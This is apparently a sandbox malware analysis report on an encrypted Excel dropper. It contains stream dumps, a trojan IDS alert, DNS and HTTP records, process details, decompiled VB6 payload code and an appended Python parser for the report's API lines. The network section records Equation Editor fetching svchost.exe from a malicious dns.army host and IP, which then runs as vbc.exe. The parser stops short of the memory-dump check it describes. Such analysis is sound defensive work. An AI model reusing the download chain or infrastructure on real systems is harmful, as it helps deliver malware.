                                                    Streams

                                                    Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                    General
                                                    Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                    File Type:data
                                                    Stream Size:64
                                                    Entropy:2.73637206947
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                    Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                    Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                    General
                                                    Stream Path:\x6DataSpaces/DataSpaceMap
                                                    File Type:data
                                                    Stream Size:112
                                                    Entropy:2.7597816111
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                    Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                    Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                    General
                                                    Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                    File Type:data
                                                    Stream Size:200
                                                    Entropy:3.13335930328
                                                    Base64 Encoded:False
                                                    Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                    Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                    Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                    General
                                                    Stream Path:\x6DataSpaces/Version
                                                    File Type:data
                                                    Stream Size:76
                                                    Entropy:2.79079600998
                                                    Base64 Encoded:False
                                                    Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                    Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                    Stream Path: EncryptedPackage, File Type: data, Stream Size: 2638920
                                                    General
                                                    Stream Path:EncryptedPackage
                                                    File Type:data
                                                    Stream Size:2638920
                                                    Entropy:7.99992439687
                                                    Base64 Encoded:True
                                                    Data ASCII:@ D ( . . . . . . . . . E . } % . . . . @ . . 7 . . [ . . . ; . = . . V i . . | . . z . . > . . . > . . a ) . . . . . T . . ? R . . . . . L . g . . * ; . ! . . . z @ ! B . . . . . * ; . ! . . . z @ ! B . . . . . * ; . ! . . . z @ ! B . . . . . * ; . ! . . . z @ ! B . . . . . * ; . ! . . . z @ ! B . . . . . * ; . ! . . . z @ ! B . . . . . * ; . ! . . . z @ ! B . . . . . * ; . ! . . . z @ ! B . . . . . * ; . ! . . . z @ ! B . . . . . * ; . ! . . . z @ ! B . . . . . * ; . ! . . . z @ ! B . . . . . * ; . ! . .
                                                    Data Raw:40 44 28 00 00 00 00 00 e0 eb cd 8f 45 91 7d 25 ce d6 05 a9 40 87 05 37 ed a0 5b 19 a5 98 3b 86 3d 86 18 56 69 9e 81 7c fa 8c 7a b4 c6 3e 84 d2 05 3e cf a3 61 29 af b8 fd e9 d5 54 e2 89 3f 52 d3 c2 ac 04 ea 4c c4 67 11 aa 2a 3b c3 21 88 fc a1 7a 40 21 42 f7 93 88 11 aa 2a 3b c3 21 88 fc a1 7a 40 21 42 f7 93 88 11 aa 2a 3b c3 21 88 fc a1 7a 40 21 42 f7 93 88 11 aa 2a 3b c3 21 88 fc
                                                    Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                    General
                                                    Stream Path:EncryptionInfo
                                                    File Type:data
                                                    Stream Size:224
                                                    Entropy:4.59623944191
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . 4 . . ) e . . V . . . . , . . W . j } . . . M . . 2 . = @ 7 . . . . . . . B . E * . m * . . f . . : . . < . ( . . . . D . . q . ] . .
                                                    Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    Timestamp                 Protocol  SID      Message                                             Source Port  Dest Port  Source IP     Dest IP
                                                    03/31/21-12:05:18.150258  TCP       2022550  ET TROJAN Possible Malicious Macro DL EXE Feb 2016  49166        80         192.168.2.22  103.141.138.118

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP

                                                    UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 31, 2021 12:05:17.091434956 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Mar 31, 2021 12:05:17.148865938 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Mar 31, 2021 12:05:17.149233103 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Mar 31, 2021 12:05:17.195324898 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Mar 31, 2021 12:05:17.821394920 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Mar 31, 2021 12:05:17.913506031 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22

                                                    DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Mar 31, 2021 12:05:17.091434956 CEST | 192.168.2.22 | 8.8.8.8 | 0x6a02 | Standard query (0) | is.gd | A (IP address) | IN (0x0001)
Mar 31, 2021 12:05:17.149233103 CEST | 192.168.2.22 | 8.8.8.8 | 0x6a02 | Standard query (0) | is.gd | A (IP address) | IN (0x0001)
Mar 31, 2021 12:05:17.821394920 CEST | 192.168.2.22 | 8.8.8.8 | 0x2596 | Standard query (0) | stdyworkfinetraistfh.dns.army | A (IP address) | IN (0x0001)

                                                    DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Mar 31, 2021 12:05:17.148865938 CEST | 8.8.8.8 | 192.168.2.22 | 0x6a02 | No error (0) | is.gd | | 104.25.234.53 | A (IP address) | IN (0x0001)
Mar 31, 2021 12:05:17.148865938 CEST | 8.8.8.8 | 192.168.2.22 | 0x6a02 | No error (0) | is.gd | | 172.67.83.132 | A (IP address) | IN (0x0001)
Mar 31, 2021 12:05:17.148865938 CEST | 8.8.8.8 | 192.168.2.22 | 0x6a02 | No error (0) | is.gd | | 104.25.233.53 | A (IP address) | IN (0x0001)
Mar 31, 2021 12:05:17.195324898 CEST | 8.8.8.8 | 192.168.2.22 | 0x6a02 | No error (0) | is.gd | | 172.67.83.132 | A (IP address) | IN (0x0001)
Mar 31, 2021 12:05:17.195324898 CEST | 8.8.8.8 | 192.168.2.22 | 0x6a02 | No error (0) | is.gd | | 104.25.234.53 | A (IP address) | IN (0x0001)
Mar 31, 2021 12:05:17.195324898 CEST | 8.8.8.8 | 192.168.2.22 | 0x6a02 | No error (0) | is.gd | | 104.25.233.53 | A (IP address) | IN (0x0001)
Mar 31, 2021 12:05:17.913506031 CEST | 8.8.8.8 | 192.168.2.22 | 0x2596 | No error (0) | stdyworkfinetraistfh.dns.army | | 103.141.138.118 | A (IP address) | IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • stdyworkfinetraistfh.dns.army

                                                    HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49166 | 103.141.138.118 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | kBytes transferred | Direction | Data
Mar 31, 2021 12:05:18.150258064 CEST | 6 | OUT | GET /findoc/svchost.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Connection: Keep-Alive
Host: stdyworkfinetraistfh.dns.army

Mar 31, 2021 12:05:18.380635977 CEST | 7 | IN | HTTP/1.1 200 OK
Date: Wed, 31 Mar 2021 10:05:14 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.0
Last-Modified: Wed, 31 Mar 2021 00:01:16 GMT
ETag: "12000-5bec9d05b2f1c"
Accept-Ranges: bytes
Content-Length: 73728
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload


                                                    HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port
Mar 31, 2021 12:05:17.325469971 CEST | 172.67.83.132 | 443 | 192.168.2.22 | 49165

Certificates (Subject / Issuer / Not Before / Not After):
• CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US / CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US / Thu Jul 09 02:00:00 CEST 2020 / Fri Jul 09 14:00:00 CEST 2021
• CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US / CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE / Mon Jan 27 13:48:08 CET 2020 / Wed Jan 01 00:59:59 CET 2025

JA3 SSL Client Fingerprint: 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,0
JA3 SSL Client Digest: 36f7277af969a6947a61ae0b815907a1

                                                    Code Manipulations

                                                    Statistics

                                                    CPU Usage


                                                    Memory Usage


                                                    High Level Behavior Distribution


                                                    Behavior


                                                    System Behavior

                                                    General

Start time: 12:04:51
Start date: 31/03/2021
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase: 0x13f330000
File size: 27641504 bytes
MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                    General

Start time: 12:05:13
Start date: 31/03/2021
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase: 0x400000
File size: 543304 bytes
MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                    General

Start time: 12:05:16
Start date: 31/03/2021
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\Public\vbc.exe'
Imagebase: 0x400000
File size: 73728 bytes
MD5 hash: 6CC6D1DD6CDD848693426A270563C921
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Visual Basic
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 6%, ReversingLabs
Reputation: low

                                                    Disassembly

                                                    Code Analysis

                                                      Executed Functions

                                                      C-Code - Quality: 90%
                                                      			_entry_() {
                                                      				signed char _t1;
                                                      				intOrPtr* _t2;
                                                      				intOrPtr* _t3;
                                                      				void* _t4;
                                                      
                                                      				_push("VB5!6&*"); // executed
                                                      				L00401202(); // executed
                                                      				 *_t1 =  *_t1 + _t1;
                                                      				 *_t1 =  *_t1 + _t1;
                                                      				 *_t1 =  *_t1 + _t1;
                                                      				 *_t1 =  *_t1 ^ _t1;
                                                      				 *_t1 =  *_t1 + _t1;
                                                      				_t2 = _t1 + 1;
                                                      				 *_t2 =  *_t2 + _t2;
                                                      				 *_t2 =  *_t2 + _t2;
                                                      				 *_t2 =  *_t2 + _t2;
                                                      				 *_t3 =  *_t3 + _t4;
                                                      				goto [far dword [ecx-0x10985840];
                                                      			}

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
• Source File: 00000004.00000002.2379265180.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2379260716.0000000000400000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2379274369.0000000000410000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2379278850.0000000000411000.00000002.00020000.sdmp
                                                      Similarity
                                                      • API ID: #100
                                                      • String ID: VB5!6&*
                                                      • API String ID: 1341478452-3593831657
Uniqueness
• Uniqueness Score: -1.00%

                                                      Non-executed Functions

Memory Dump Source
• Source File: 00000004.00000002.2379236781.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
• Uniqueness Score: -1.00%

                                                      C-Code - Quality: 60%
                                                      			E0040E754(void* __eax, void* __ebx, signed int __ecx, void* __edi, void* __esi, signed int _a4, void* _a20) {
                                                      				void* _v3;
                                                      				signed int _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr _v16;
                                                      				void* _v40;
                                                      				void* _v52;
                                                      				void* _v56;
                                                      				void* _v60;
                                                      				void* _v64;
                                                      				void* _v72;
                                                      				void* _v80;
                                                      				void* _v88;
                                                      				void* _v96;
                                                      				void* _v104;
                                                      				void* _v112;
                                                      				void* _v116;
                                                      				void* _v120;
                                                      				void* _v128;
                                                      				void* _v132;
                                                      				void* _v136;
                                                      				void* _v140;
                                                      				void* _v144;
                                                      				void* _v148;
                                                      				void* _v152;
                                                      				void* _v168;
                                                      				void* _v184;
                                                      				void* _v196;
                                                      				void* _v200;
                                                      				void* _v204;
                                                      				void* _v208;
                                                      				void* _v212;
                                                      				void* _v216;
                                                      				void* _v220;
                                                      				void* _v224;
                                                      				void* _v228;
                                                      				void* _v232;
                                                      				void* _v236;
                                                      				void* _v240;
                                                      				void* _v244;
                                                      				void* _v248;
                                                      				void* _v252;
                                                      				void* _v256;
                                                      				void* _v260;
                                                      				void* _t280;
                                                      				void* _t281;
                                                      				void* _t284;
                                                      				intOrPtr _t285;
                                                      
                                                      				_t280 = __esi;
                                                      				_t285 = _t284 - 0xc;
                                                      				asm("in al, dx");
                                                      				asm("adc [eax], eax");
                                                      				 *[fs:0x0] = _t285;
                                                      				L00401100();
                                                      				_v16 = _t285;
                                                      				asm("hlt");
                                                      				_v12 = 0x4010d0;
                                                      				_v8 = _a4 & 0x00000001;
                                                      				_a4 = _a4 & 0x000000fe;
                                                      				 *(__ebx + 0x8b0845) =  *(__ebx + 0x8b0845) | __ecx;
                                                      				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], es, _t281);
                                                      				asm("ror byte [edi], 0x84");
                                                      				asm("loop 0x3");
                                                      				 *0x00000000 =  *0x00000000;
                                                      			}

                                                      APIs
                                                      • __vbaChkstk.MSVBVM60(?,00401106), ref: 0040E772
                                                      • __vbaNew2.MSVBVM60(0040DE20, ~[,?,?,?,?,00401106), ref: 0040E7BD
                                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E7F6
                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040DCC0,00000060), ref: 0040E82E
                                                      • __vbaNew2.MSVBVM60(0040DE20, ~[), ref: 0040E855
                                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E88E
                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040DCD0,000001C0), ref: 0040E8D8
                                                      • __vbaFpI4.MSVBVM60(00000000,?,0040DCD0,000001C0), ref: 0040E8F2
                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,004010D0,0040DAA4,000002C8,?,?,?,?,00000000), ref: 0040E966
                                                      • __vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,?,?,00000000), ref: 0040E984
                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,004010D0,0040DAA4,000002B4), ref: 0040E9B5
                                                      • __vbaVarForInit.MSVBVM60(?,?,?,00000002,00000003,00000002), ref: 0040EA0E
                                                      • __vbaNew2.MSVBVM60(0040DE20, ~[,?,?,?,00000002,00000003,00000002), ref: 0040EA31
                                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040EA6A
                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DCE0,00000100), ref: 0040EAA8
                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,004010D0,0040DAD4,000006F8,?,?,002E0077,?,?), ref: 0040EB09
                                                      • __vbaFreeStr.MSVBVM60(?,?,002E0077,?,?), ref: 0040EB26
                                                      • __vbaFreeObj.MSVBVM60(?,?,002E0077,?,?), ref: 0040EB2E
                                                      • #589.MSVBVM60(00000001,?,?,002E0077,?,?), ref: 0040EB35
                                                      • __vbaNew2.MSVBVM60(0040DD10,004102D4,00000001,?,?,002E0077,?,?), ref: 0040EB58
                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DD00,0000001C,?,?,002E0077,?,?), ref: 0040EBBA
                                                      • __vbaNew2.MSVBVM60(0040DE20, ~[,?,?,002E0077,?,?), ref: 0040EBF8
                                                      • __vbaObjSet.MSVBVM60(?,00000000,?,?,002E0077,?,?), ref: 0040EC31
                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DCC0,00000118,?,?,002E0077,?,?), ref: 0040EC6F
                                                      • __vbaChkstk.MSVBVM60(?,?,002E0077,?,?), ref: 0040EC86
                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040DD20,00000060,?,?,002E0077,?,?), ref: 0040ECCC
                                                      • __vbaFreeStr.MSVBVM60(?,?,002E0077,?,?), ref: 0040ECE3
                                                      • __vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,002E0077,?,?), ref: 0040ECF2
                                                      • __vbaVarForNext.MSVBVM60(?,?,?,00000001,?,?,002E0077,?,?), ref: 0040ED0C
                                                      Strings
                                                      Memory Dump Source
• Source File: 00000004.00000002.2379265180.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2379260716.0000000000400000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2379274369.0000000000410000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2379278850.0000000000411000.00000002.00020000.sdmp
                                                      Similarity
                                                      • API ID: __vba$CheckHresult$FreeNew2$ChkstkList$#589InitNext
                                                      • String ID: ~[$w
                                                      • API String ID: 14863815-3546532830
Uniqueness
• Uniqueness Score: -1.00%

                                                      C-Code - Quality: 60%
                                                      			E00404953(void* __eax, void* __ebx, signed int __ecx, void* __edi, void* __esi) {
                                                      				void* _t280;
                                                      				void* _t281;
                                                      				void* _t282;
                                                      				intOrPtr _t283;
                                                      
                                                      				_t280 = __esi;
                                                      				asm("in al, dx");
                                                      				asm("adc [eax], eax");
                                                      				 *[fs:0x0] = _t283;
                                                      				L00401100();
                                                      				 *((intOrPtr*)(_t281 - 0xc)) = _t283;
                                                      				asm("hlt");
                                                      				 *((intOrPtr*)(_t281 - 8)) = 0x4010d0;
                                                      				 *(_t281 - 4) =  *(_t281 + 8) & 0x00000001;
                                                      				 *(_t281 + 8) =  *(_t281 + 8) & 0x000000fe;
                                                      				_t282 = _t281 + 1;
                                                      				 *(__ebx + 0x8b0845) =  *(__ebx + 0x8b0845) | __ecx;
                                                      				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)))) + 4))( *((intOrPtr*)(_t282 + 8)), __edi, __esi, __ebx,  *[fs:0x0], es);
                                                      				asm("ror byte [edi], 0x84");
                                                      				asm("loop 0x3");
                                                      				 *0x00000000 =  *0x00000000;
                                                      			}

                                                      APIs
                                                      • __vbaChkstk.MSVBVM60(?,00401106), ref: 0040E772
                                                      • __vbaNew2.MSVBVM60(0040DE20, ~[,?,?,?,?,00401106), ref: 0040E7BD
                                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E7F6
                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040DCC0,00000060), ref: 0040E82E
                                                      • __vbaNew2.MSVBVM60(0040DE20, ~[), ref: 0040E855
                                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E88E
                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040DCD0,000001C0), ref: 0040E8D8
                                                      • __vbaFpI4.MSVBVM60(00000000,?,0040DCD0,000001C0), ref: 0040E8F2
                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,004010D0,0040DAA4,000002C8,?,?,?,?,00000000), ref: 0040E966
                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,004010D0,0040DAA4,000002B4), ref: 0040E9B5
                                                      • __vbaVarForInit.MSVBVM60(?,?,?,00000002,00000003,00000002), ref: 0040EA0E
                                                      Strings
                                                      Memory Dump Source
• Source File: 00000004.00000002.2379265180.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2379260716.0000000000400000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2379274369.0000000000410000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2379278850.0000000000411000.00000002.00020000.sdmp
                                                      Similarity
                                                      • API ID: __vba$CheckHresult$New2$ChkstkInit
                                                      • String ID: ~[
                                                      • API String ID: 4284077100-2315863030
Uniqueness
• Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E0040ED95(void* __ebx, void* __edi, void* __esi, void* __eflags, long long __fp0, intOrPtr* _a4, void* _a20) {
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v12;
                                                      				long long* _v16;
                                                      				char _v28;
                                                      				void* _t14;
                                                      				char* _t16;
                                                      				void* _t21;
				void* _t23;
				long long* _t24;

				// VB6 method prologue: push a new SEH frame and make room on the stack.
				_t24 = _t23 - 0xc;
				 *[fs:0x0] = _t24;
				L00401100();                       // __vbaChkstk (ref 0040EDB1): stack probe
				_v16 = _t24;                       // saved previous SEH chain entry
				_v12 = 0x4010e8;                   // SEH handler stub for this function
				_v8 = 0;
				// Call through the vtable slot at +4 of the object in _a4 (IUnknown::AddRef
				// in the COM layout VB6 uses for 'Me'); the extra arguments are leftovers
				// of the register state and SEH setup that the decompiler could not discard.
				_t14 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x14,  *[fs:0x0], 0x401106, _t21);
				_t16 =  &_v28;
				L004011A2();                       // __vbaStrCopy (ref 0040EDDB): copy a BSTR into the local at _v28
				asm("fldz");                       // load 0.0 onto the FPU stack
				_push(_t16);
				_push(_t16);
				 *_t24 = __fp0;                    // store the 0.0 as an 8-byte argument on the stack
				L00401196();                       // MSVBVM60 ordinal #584 (ref 0040EDE7)
				L0040119C();                       // __vbaFpR8 (ref 0040EDEC): result is a double left in ST(0)
				// Compare that double with the constant at 0x4010e0 and move the FPU
				// condition codes into EFLAGS so the decompiler can express the branch.
				asm("fcomp qword [0x4010e0]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags != 0) {
					// Not equal: __vbaEnd (ref 0040EDFC), the VB 'End' statement,
					// terminates the process. Equal: execution continues below.
					L00401190();
				}
				asm("wait");
				// Standard VB6 epilogue: the address of the next instruction (0x40ee10)
				// is pushed as the return address for __vbaFreeStr (ref 0040EE0A), which
				// releases the temporary string before the function returns.
				_push(E0040EE10);
				L004011C6();
				return _t14;
			}
Instruction addresses covered by this listing: 0x0040ed98 to 0x0040ee0f

APIs
• __vbaChkstk.MSVBVM60(?,00401106), ref: 0040EDB1
• __vbaStrCopy.MSVBVM60(?,?,?,?,00401106), ref: 0040EDDB
• #584.MSVBVM60(?,?,?,?,?,?,00401106), ref: 0040EDE7
• __vbaFpR8.MSVBVM60(?,?,?,?,?,?,00401106), ref: 0040EDEC
• __vbaEnd.MSVBVM60(?,?,?,?,?,?,00401106), ref: 0040EDFC
• __vbaFreeStr.MSVBVM60(0040EE10,?,?,?,?,?,?,00401106), ref: 0040EE0A
Memory Dump Source
• Source File: 00000004.00000002.2379265180.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2379260716.0000000000400000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2379274369.0000000000410000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2379278850.0000000000411000.00000002.00020000.sdmp
Similarity
• API ID: __vba$#584ChkstkCopyFree
• String ID:
• API String ID: 3519716879-0
• Opcode ID: 80edf9c7639351e3800ba2d18ec55b890a72b969b598f8c9298005737cc6cdd8
• Instruction ID: 15d200c960d8d0cd224b9cd72909cc597d79f8a8b94c26f69f4931513196bdc8
• Opcode Fuzzy Hash: 80edf9c7639351e3800ba2d18ec55b890a72b969b598f8c9298005737cc6cdd8
• Instruction Fuzzy Hash: A5F08130800109ABC704EF92C946B9E7FB9EF08744F00847BB1406B1E1C77C5950CBD8
Uniqueness
Uniqueness Score: -1.00%
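When triaging a report like this one, the useful checks on the block above are mechanical: do the API call sites really fall inside the listed function range, which call-site arguments are concrete addresses, and which of the dumped memory regions were executable when the process was dumped. The following parser is an added example written for this page; it is not part of the Joe Sandbox report or its tooling. It works on the API bullet lines and the .sdmp file names copied from the section above (embedded as constructed sample input). The positional meaning of the .sdmp name fields (process index, dump index, sequence number, base address, protection, region type) is an assumption inferred from these four names; the PAGE_* values are the documented Win32 memory protection constants.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample input: the "APIs" bullets and "Memory Dump Source" file
# names from the report section above, copied verbatim.
API_LINES = [
    "• __vbaChkstk.MSVBVM60(?,00401106), ref: 0040EDB1",
    "• __vbaStrCopy.MSVBVM60(?,?,?,?,00401106), ref: 0040EDDB",
    "• #584.MSVBVM60(?,?,?,?,?,?,00401106), ref: 0040EDE7",
    "• __vbaFpR8.MSVBVM60(?,?,?,?,?,?,00401106), ref: 0040EDEC",
    "• __vbaEnd.MSVBVM60(?,?,?,?,?,?,00401106), ref: 0040EDFC",
    "• __vbaFreeStr.MSVBVM60(0040EE10,?,?,?,?,?,?,00401106), ref: 0040EE0A",
]
DUMP_NAMES = [
    "00000004.00000002.2379265180.0000000000401000.00000020.00020000.sdmp",
    "00000004.00000002.2379260716.0000000000400000.00000002.00020000.sdmp",
    "00000004.00000002.2379274369.0000000000410000.00000004.00020000.sdmp",
    "00000004.00000002.2379278850.0000000000411000.00000002.00020000.sdmp",
]

# One API bullet: <symbol>.<module>(<args>), ref: <hex call-site address>.
# The symbol may be an ordinal-only import such as "#584".
API_RE = re.compile(
    r"^[•\s]*(?P<name>[^\s.(]+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiRef:
    name: str                   # imported symbol or "#<ordinal>"
    module: str                 # DLL the symbol resolves from
    args: List[Optional[int]]   # call-site arguments; None where the report shows "?"
    ref: int                    # address of the call instruction

    @property
    def known_args(self) -> List[int]:
        return [a for a in self.args if a is not None]


def parse_api_line(line: str) -> ApiRef:
    m = API_RE.match(line)
    if not m:
        raise ValueError(f"not an API reference line: {line!r}")
    args = [None if a.strip() == "?" else int(a, 16)
            for a in m["args"].split(",") if a.strip()]
    return ApiRef(m["name"], m["module"], args, int(m["ref"], 16))


def parse_api_lines(lines: List[str]) -> List[ApiRef]:
    return [parse_api_line(line) for line in lines]


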